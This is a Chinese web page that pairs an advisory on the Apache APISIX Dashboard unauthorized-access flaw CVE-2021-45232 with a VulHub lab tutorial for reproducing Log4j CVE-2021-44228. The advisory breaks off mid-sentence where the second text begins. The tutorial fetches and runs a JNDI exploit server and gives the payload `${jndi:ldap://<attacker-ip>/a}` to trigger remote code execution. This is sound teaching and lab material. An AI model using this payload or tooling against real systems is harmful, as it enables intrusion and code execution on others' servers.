Apache APISIX Dashboard 未授权访问漏洞公告(CVE-2021-45232)

问题描述

攻击者无需登录 Apache APISIX Dashboard 即可访问某些接口,从而进行未授权更改或获取 Apache APISIX Route、Upstream、Service 等相关配置信息,并造成 SSRF、攻击者搭建恶意流量代理和任意代码执行等问题。

影响版本

Apache APISIX Dashboard 2.7 - 2.10 版本

解决方案

请及时更新至 Apache APISIX Dashboard 2.10.1 及以上版本。

安全建议

建议用户及时更改默认用户名与密码,并限制来源 IP 访问 Apache APISIX Dashboard。

漏洞详情

漏洞公开时间:2021 年 12 月 27 日

CVE 详细信息:https://nvd.nist.gov/vuln/detail/CVE-2021-45232

贡献者简介

该漏洞由源堡科技安全团队的朱禹成发现,并向 Apache 软件基金会上报该漏洞。感谢各位对 Apache APISIX 社区的贡献。

图片

关于 Apache APISIX

Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。

Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。目前已被普华永道数据安全团队、腾讯蓝

### CVE-2021-44228 漏洞复现环境搭建教程 #### 一、概述 CVE-2021-44228 是 Log4j2 的远程代码执行漏洞,影响范围广泛。为了研究该漏洞的工作原理及其潜在风险,可以通过 VulHub 靶场来快速构建复现环境。 --- #### 二、VulHub 环境准备 VulHub 是一个基于 Docker 和 Docker Compose 构建的安全漏洞学习平台,提供了多种常见漏洞的复现环境。以下是针对 CVE-2021-44228 的具体操作步骤: 1. **安装依赖工具** - 安装 Docker 和 Docker Compose 工具。 - 确保系统已正确配置并运行 `docker` 和 `docker-compose` 命令[^2]。 2. **克隆 VulHub 仓库** 使用 Git 将 VulHub 项目克隆到本地: ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. **切换至目标目录** 进入 CVE-2021-44228 对应的文件夹路径: ```bash cd vulhub/log4j/CVE-2021-44228/ ``` 4. **启动容器服务** 执行以下命令以启动所需的容器服务: ```bash docker-compose up -d ``` 此时会自动拉取必要的镜像并初始化环境。完成后可以访问 http://<your-ip>:8983 来查看 Apache Solr 的管理界面[^4]。 5. **验证环境状态** 如果一切正常,应该能够看到 Solr Dashboard 页面加载成功。这表明漏洞复现所需的服务已经就绪。 --- #### 三、漏洞利用测试 完成上述准备工作之后,可按照如下方法尝试触发 JNDI 注入攻击向量: 1. 下载用于模拟恶意行为的 Exploit 工具包: ```bash wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/jndi-exploit-server.jar ``` 2. 启动监听端口等待连接请求到来: ```bash java -jar jndi-exploit-server.jar <local-ip> ``` 3. 修改日志记录语句使其包含特定 payload 数据结构形式,例如 `${jndi:ldap://<attacker-ip>/a}` 并发送给目标应用程序处理逻辑部分去解析它从而实现 RCE 效果[^5]。 --- #### 四、清理工作 实验结束后务必及时停止所有正在运行中的实例资源以免造成不必要的安全隐患或者性能消耗等问题发生: ```bash docker-compose down ``` 此命令将会终止当前 session 中所有的关联进程并将它们移除掉同时释放所占用的相关物理硬件设备上的存储空间位置等宝贵计算资源[^3]。 --- ### 注意事项 - 实验应在隔离环境中进行,切勿对外网开放任何敏感接口。 - 测试完毕后需立即删除相关数据以防泄露隐私信息。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

API7.ai 技术团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值